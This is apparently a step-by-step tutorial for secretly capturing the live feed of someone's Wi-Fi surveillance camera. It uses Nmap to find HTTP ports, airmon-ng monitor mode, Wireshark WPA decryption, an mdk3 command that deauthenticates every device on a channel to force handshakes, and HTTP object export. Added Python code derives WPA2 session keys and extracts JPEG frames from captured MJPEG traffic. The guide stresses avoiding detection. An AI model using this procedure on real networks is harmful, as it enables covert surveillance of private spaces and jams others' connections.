It is common for IoT devices, such as Wi-Fi surveillance cameras, to host a web page for controlling or configuring the device that is served over plain HTTP instead of HTTPS. This means anyone who knows the Wi-Fi password and is within radio range can read the traffic to and from the camera, so an attacker can intercept the surveillance footage whenever someone on the network is viewing the camera's HTTP display page.
IoT Devices and Administration Pages
One thing IoT devices usually have in common is a lack of focus on security. Convenience is often more important, so details such as securing a device's management page are an afterthought for some developers. As a result, these devices commonly show up in Nmap scans with insecure ports open. Worse, some of them are designed to connect directly to the Internet, not just the internal network.
For security cameras, this problem is made worse if the camera also hosts an insecure web page where the owner can watch video directly from the camera. If so, anyone who knows the Wi-Fi password can see exactly what the camera's owner sees. Since most businesses and homes with a camera have a monitor set up to display the feed, this is a serious problem for users with weak Wi-Fi passwords or for anyone sharing the network with other users.
Ports 80 and 81
When scanning devices with Nmap, certain ports tend to show up open on routers, security cameras, and other Wi-Fi enabled IoT devices. If you see port 80, 81, 8080, or 8081 open, it most likely means the device is hosting an insecure HTTP web interface on that port. While you need the Wi-Fi password to scan for these ports, once you are on the network you can browse to them and inspect the web application they host.
Port 443 is used for HTTPS; that traffic is encrypted and does not carry the same interception risk. Any device exposing an unencrypted HTTP port on the local network, by contrast, is an invitation for an attacker to learn more about it. That may mean attempting to log in, gathering information about the firmware the device is running, or attacking it with a tool such as RouterSploit to attempt a break-in.
A less obvious risk is that someone can intercept passwords and other information as they pass through the insecure web application. When a target has logged in and is watching the live surveillance feed in an insecure web app, it is relatively easy to intercept the web traffic and decode the captured packets back into image files.
Intercepting traffic with Wireshark
To make this work, we use Wireshark to monitor the Wi-Fi traffic between the target computer and the router. Our goal is to capture the unencrypted HTTP traffic flowing to the target's computer while it displays the surveillance camera feed. Before we can do that, there are a few things to be aware of.
We need to be able to decrypt the Wi-Fi traffic. If we know the password, we could simply join the network, but that carries a risk of detection. Instead, we can give Wireshark the Wi-Fi password and decrypt the traffic we capture without ever connecting to the network. This keeps the attack mostly passive, leaving little opportunity for discovery.
One crucial thing we do need, even passively, is a Wi-Fi handshake. Wireshark must observe the WPA four-way handshake between the client and the access point to derive the per-session key that protects the subsequent traffic, so knowing the password alone is not enough. To succeed, we need to isolate the traffic of the computer we are interested in with a Wireshark filter, capture a WPA four-way handshake for that client, and then decrypt the data using the password we know.
The conditions must be favorable for this attack to succeed. If the camera does not use an insecure HTTP interface, the data is encrypted and we cannot see it.
If no one is watching the camera feed or it is not being displayed on a monitor, no insecure traffic is generated, so we will see nothing. If we do not know the network password, we cannot decrypt the traffic we capture. If we cannot temporarily knock a client off the network to force a four-way handshake, knowing the password does not help. And finally, if we are out of the network's radio range, we cannot capture traffic we cannot hear.
While this may seem like a lot of requirements, the scenario is very common. If the target has a Wi-Fi surveillance camera and a monitor displaying its feed, all you need beyond the Wi-Fi password is a Kali Linux-compatible wireless network adapter.
Once you're within range and have Kali Linux loaded, you should be ready. Plug in your wireless network adapter and make sure Wireshark is installed. If you do not have Wireshark, you can download the installer from the Wireshark website.
Recommended Network Adapter: Alfa AWUS036NHA Long-range Wireless B / G / N-USB Adapter
Step 1: Access the Web Camera via the Insecure Interface
To start, access the built-in web interface of the webcam or Wi-Fi surveillance camera you want to intercept. In a browser window on your "target computer", navigate to the HTTP interface, enter the required password, and begin viewing the live camera feed.
If you need to locate the camera on the network, you can run an Nmap scan to discover devices on the network with insecure HTTP ports open.
You need to know the network range for this command. You can find it by running ifconfig and noting the IP address assigned to your computer, then running ipcalc with that IP address to calculate the network range. It should be something like 192.168.0.0/24. Run the following command, replacing 192.168.0.0/24 with your own network range.
sudo nmap -p 80,81,8080,8081 192.168.0.0/24
Look for devices that report one of these ports as "open". If a port is open, you can browse to it by entering the device's IP address followed by a colon and the port number; for example, to reach port 8081 on 192.168.0.1, enter 192.168.0.1:8081 in your browser's address bar.
Step 2: Identify the Channel and Prepare the WLAN Card
Next, connect your wireless network adapter, such as the Alfa AWUS036NHA. You need to do two things before starting Wireshark: first, put the card into wireless monitor mode, and second, identify the channel the target router is broadcasting on.
To put your card into monitor mode, first find its name by running ifconfig in a terminal window. The name should be something like wlan0. Once you have the name of your wireless card, enable monitor mode by running the following command in a terminal window, replacing "wlan0" with the name of your card.
airmon-ng start wlan0 && airodump-ng wlan0mon
This puts your card into wireless monitor mode and renames it with "mon" appended to the end (wlan0mon). It then starts Airodump-ng, which scans for nearby wireless networks.
Find the Wi-Fi network you want to monitor and note the channel it is currently on. We need to lock our card to this channel to intercept the images in Wireshark.
 CH  4 ][ Elapsed: 0 s ][ 2018-12-24 02:42

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C0:8A:DE:39:CD:D9  -46        2        0    0   1  130  WPA2 CCMP   MGT  TWCWiFi Passpoint
 C0:8A:DE:F9:CD:D8  -47        2        0    0   1  130  OPN              TWCWiFi
 C0:8A:DE:B9:CD:D8  -46        2        0    0   1  130  OPN              SpectrumWiFi
 C0:8A:DE:39:CD:D8  -47        2        0    0   1  130  OPN              CableWiFi
 78:96:84:00:B5:B0  -42        2        0    0   1  130  WPA2 CCMP   PSK  The Daily Planet
 00:9C:02:D2:5E:B9  -60        3        0    0   1  54e. WPA2 CCMP   PSK  HP-Print-B9-Officejet Pro 8600
 20:10:7A:92:76:43  -51        2        0    0   1  130  WPA2 CCMP   PSK  SBG6580E8
 DE:Q2:86:EC:CA:A0  -45        1        0    0  11  195  WPA2 CCMP   PSK  Bourgeois Pig Guest
 D6:04:CD:BD:33:A1  -55        1        0    0  11  130  WPA2 CCMP   PSK  DirtyLittleBirdyFeet

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

root@kali:~/Desktop#
If our target is on channel 11, we run the following command to lock our card to channel 11.
airmon-ng start wlan0mon 11
Step 3: Start Wireshark
Now that our wireless network adapter is listening on the same channel as the traffic we want to intercept, it's time to start Wireshark. When Wireshark opens, double-click the interface you put into monitor mode (wlan0mon) to start capturing.
Our card is now capturing on the correct channel, but without the network password we cannot read anything. To fix this, we need to give Wireshark the decryption key.
Step 4: Add the Network Key to Wireshark
To add decryption keys to Wireshark, click "Edit" in the menu bar, then "Preferences" to open the Preferences window. Then select "Protocols" in the sidebar to see the list of protocols Wireshark can dissect.
In the Protocols list you just opened, select "IEEE 802.11" to display the options for decrypting Wi-Fi. Make sure the "Enable decryption" checkbox is checked, then click the "Edit..." button next to "Decryption keys" to open the list of keys Wireshark will use to decrypt the traffic.
In the "WEP and WPA Decryption Keys" window, click the key type box on the left and select "wpa-pwd". We could add a "wpa-psk" here as well, but that requires computing the 256-bit pre-shared key from the passphrase and SSID ourselves, which is more complicated than simply entering the password.
For decryption to work, add the key by clicking the plus sign (+) and enter it in the format password:networkname (the Wi-Fi password, a colon, then the network's SSID) to add it to the list.
Click "OK" to save the key. We should now be able to decrypt traffic on that network, provided we can capture a Wi-Fi four-way handshake.
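The two points above, that a "wpa-psk" key is the value Wireshark would otherwise have to derive from the passphrase and SSID, and that even with that key a four-way handshake is still needed, can be made concrete. The following Python script is an added example written for this page, not code from the original guide or from Wireshark; it derives the WPA2 pairwise master key (PMK) exactly as Wireshark's "wpa-pwd" entry does, and then derives the per-session pairwise transient key (PTK), which depends on the two MAC addresses and the two nonces that only appear in the EAPOL handshake frames. The passphrase "password" and SSID "IEEE" are the IEEE 802.11 test vector; the MAC addresses and nonces are constructed values standing in for what would be read from a captured handshake.

```python
"""WPA2-PSK key derivation (added example; not code from the original guide)."""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This 64-hex-character value is what Wireshark's "wpa-psk" key type expects;
    the "wpa-pwd" type ("password:SSID") makes Wireshark run this step for you.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wireshark_key_entries(passphrase: str, ssid: str) -> dict:
    """The two equivalent ways to give Wireshark the key for a WPA2-PSK network."""
    return {"wpa-pwd": f"{passphrase}:{ssid}",
            "wpa-psk": derive_pmk(passphrase, ssid).hex()}


def _prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """CCMP PTK (48 bytes) = PRF-384(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).

    ANonce comes from EAPOL message 1 and SNonce from message 2 of the four-way
    handshake. Without those frames the PTK, and therefore the data frames it
    protects, cannot be recovered even when the PMK (the password) is known.
    """
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return _prf(pmk, b"Pairwise key expansion", data, 48)


def split_ptk(ptk: bytes) -> dict:
    """Split a CCMP PTK into KCK (handshake MIC), KEK (key wrap) and TK (data encryption)."""
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


if __name__ == "__main__":
    # IEEE 802.11 test passphrase/SSID; MACs and nonces below are constructed.
    entries = wireshark_key_entries("password", "IEEE")
    print("wpa-pwd entry:", entries["wpa-pwd"])
    print("wpa-psk entry:", entries["wpa-psk"])
    pmk = derive_pmk("password", "IEEE")
    ap, sta = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = bytes([0x11]) * 32, bytes([0x22]) * 32
    ptk = derive_ptk(pmk, ap, sta, anonce, snonce)
    print("TK used for this session:", split_ptk(ptk)["tk"].hex())
    # A different ANonce (a new association) yields a different session key.
    print("TK after a new handshake:",
          split_ptk(derive_ptk(pmk, ap, sta, bytes([0x33]) * 32, snonce))["tk"].hex())
```

Each time the client reconnects, the access point sends a fresh ANonce, so the TK changes and Wireshark needs that specific handshake to decrypt that specific session; this is why the guide goes on to force a reconnection rather than relying on the password alone.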
Step 5: Filter Traffic to the Target Device
We will see a lot of traffic in our Wireshark capture. Although we cannot decrypt it yet because we do not have a handshake, we can create a filter so that only traffic to the device we are monitoring is displayed.
The easiest way to do this is to find a frame addressed to the computer we are interested in, then build a display filter that shows only frames going to that MAC address. Any traffic directed to the target computer will then be displayed, and all other network traffic will be hidden.
In the packet details pane of a frame sent to the target device, right-click the "Receiver address" field, select "Apply as Filter", then "Selected". Now only frames addressed to the target should be displayed.
Step 6: Capture a Four-Way Handshake
Now that we have isolated the traffic to our target device, we need to generate a four-way handshake by temporarily knocking the target computer off the network while Wireshark is listening. For this we can use MDK3, a tool covered in an earlier guide, which can kick every device off the Wi-Fi network and so force them to re-authenticate, generating handshakes.
Since we already know which channel the target network is on, we can use MDK3 to deauthenticate every device on that channel. It should not take long to generate a WPA handshake. Run the following command in a terminal window to jam the network, replacing "wlan0mon" with the name of your wireless card and "11" with the channel you are attacking.
mdk3 wlan0mon d -c 11
After a few moments, devices on the network should reconnect automatically, letting you capture the WPA four-way handshake. If you want to confirm you have captured a handshake, open a new terminal window and run Airodump-ng, which reports when it sees one.
Enter airodump-ng -c 11 wlan0mon (again replacing "11" and "wlan0mon" with your channel and card name) to watch for WPA handshakes while MDK3 is running.
Once "WPA handshake:" followed by a BSSID appears in the top right of the Airodump-ng output, you have captured a WPA four-way handshake! Make sure that MAC address matches the BSSID of the targeted Wi-Fi network, so that you have not captured a handshake for the wrong network.
Now that we have a four-way handshake and have entered the network key, Wireshark can decrypt the data transmitted over the network. HTTPS is still off the table, but we should be able to see plain HTTP.
Step 7: Filter for HTTP Traffic
Even though we can now read the network traffic and have limited the display to the target computer, other traffic to that computer is still mixed in and makes it hard to focus on what we are looking for. To cut through it, we add another display filter that shows only the HTTP traffic flowing on the network.
In the Wireshark main view, enter http in the display filter bar.
This limits the display to HTTP traffic to the computer we are monitoring, narrowing our view to the traffic of the insecure web app. Now we need to decode the intercepted packets into images so we can see what the target is seeing from the surveillance camera.
Step 8: Export the Captured Images
Now that we can see the HTTP traffic from the web app, we need to pull out the JPEG files it carries so we have something to work with. Stop the capture, click "File", then "Export Objects". We want the HTTP objects Wireshark found, so click "HTTP" to open the object list.
The HTTP object list shows every HTTP object we intercepted. Here we can see the JPEG images we want to recover. Select one or all of them, click "Save" or "Save All", and choose a location to export the files to.
Click "Close" and navigate to the folder where you exported the images. You should see the files Wireshark recovered from the capture; how many there are depends on how long you captured for.
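The "Export Objects" step reassembles the camera's HTTP responses and writes out the JPEGs they carry. To show what that involves, and the one failure mode a practitioner hits most often, here is an added Python example written for this page (not code from the original guide or from Wireshark). It assumes the camera serves its live view either as single image/jpeg responses or as a multipart/x-mixed-replace (MJPEG) stream, a common but not universal arrangement; the HTTP responses it parses are constructed inline to stand in for a reassembled TCP stream from the capture. Frames that were cut off when the capture stopped are detected by their missing JPEG end-of-image marker and are not written out.

```python
"""Recover JPEG frames from captured HTTP camera traffic (added example)."""
import re
from pathlib import Path

SOI = b"\xff\xd8"  # JPEG start-of-image marker
EOI = b"\xff\xd9"  # JPEG end-of-image marker


def _parse_headers(block: bytes) -> dict:
    """Turn 'Name: value' lines into a dict keyed by lower-cased name."""
    headers = {}
    for line in block.strip().split(b"\r\n"):
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers


def _is_complete_jpeg(data: bytes) -> bool:
    """A frame is only usable if both JPEG markers are present."""
    return data.startswith(SOI) and data.endswith(EOI)


def extract_jpegs(response: bytes) -> list:
    """Return the JPEG images carried by one reassembled HTTP response."""
    head, _, body = response.partition(b"\r\n\r\n")
    headers = _parse_headers(head.split(b"\r\n", 1)[1] if b"\r\n" in head else b"")
    ctype = headers.get(b"content-type", b"")

    if not ctype.startswith(b"multipart/x-mixed-replace"):
        # Single-image response: trust Content-Length when present.
        length = headers.get(b"content-length")
        payload = body[: int(length)] if length else body
        return [payload] if _is_complete_jpeg(payload) else []

    match = re.search(rb'boundary="?([^";\r\n]+)"?', ctype)
    if not match:
        return []
    boundary = match.group(1)
    # RFC 2046 delimiters are "--" + boundary, but some cameras already put the
    # dashes in the parameter; do not double them.
    delimiter = boundary if boundary.startswith(b"--") else b"--" + boundary

    images = []
    for part in body.split(delimiter):
        if b"\r\n\r\n" not in part:
            continue  # preamble, epilogue, or the closing "--" marker
        part_head, _, payload = part.partition(b"\r\n\r\n")
        length = _parse_headers(part_head).get(b"content-length")
        payload = payload[: int(length)] if length else payload.rstrip(b"\r\n")
        if _is_complete_jpeg(payload):  # drops a frame truncated by the capture
            images.append(payload)
    return images


def save_frames(images: list, outdir: str) -> list:
    """Write each frame as frame_NNN.jpg and return the paths written."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for i, img in enumerate(images):
        path = out / f"frame_{i:03d}.jpg"
        path.write_bytes(img)
        paths.append(str(path))
    return paths


# --- constructed sample data (stands in for a reassembled capture) ---------

def make_test_jpeg(seed: int) -> bytes:
    """Minimal byte string with valid JPEG framing markers (not a viewable image)."""
    return SOI + b"\xff\xe0\x00\x10JFIF\x00" + bytes([0x10 + seed]) * 16 + EOI


def build_mjpeg_response(frames: list, truncate_last: bool = False) -> bytes:
    """Constructed multipart/x-mixed-replace response, optionally cut mid-frame."""
    boundary = b"myboundary"
    body = b""
    for frame in frames:
        body += (b"--" + boundary + b"\r\nContent-Type: image/jpeg\r\nContent-Length: "
                 + str(len(frame)).encode() + b"\r\n\r\n" + frame + b"\r\n")
    if truncate_last:
        cut = make_test_jpeg(99)
        body += (b"--" + boundary + b"\r\nContent-Type: image/jpeg\r\nContent-Length: "
                 + str(len(cut)).encode() + b"\r\n\r\n" + cut[:-4])  # capture stopped here
    else:
        body += b"--" + boundary + b"--\r\n"
    return (b"HTTP/1.1 200 OK\r\nContent-Type: multipart/x-mixed-replace; boundary="
            + boundary + b"\r\n\r\n" + body)


def build_single_response(frame: bytes) -> bytes:
    """Constructed single image/jpeg response, as a snapshot endpoint returns."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\nContent-Length: "
            + str(len(frame)).encode() + b"\r\n\r\n" + frame)


if __name__ == "__main__":
    frames = [make_test_jpeg(i) for i in range(3)]
    recovered = extract_jpegs(build_mjpeg_response(frames, truncate_last=True))
    print(f"recovered {len(recovered)} complete frames (1 truncated frame dropped)")
    print(save_frames(recovered, "recovered_frames"))
```

In practice you would feed this the reassembled stream Wireshark shows under "Follow TCP Stream" (saved as raw bytes); Wireshark's own exporter does the same reassembly and multipart splitting, which is why the object list fills with individual JPEGs rather than one large response.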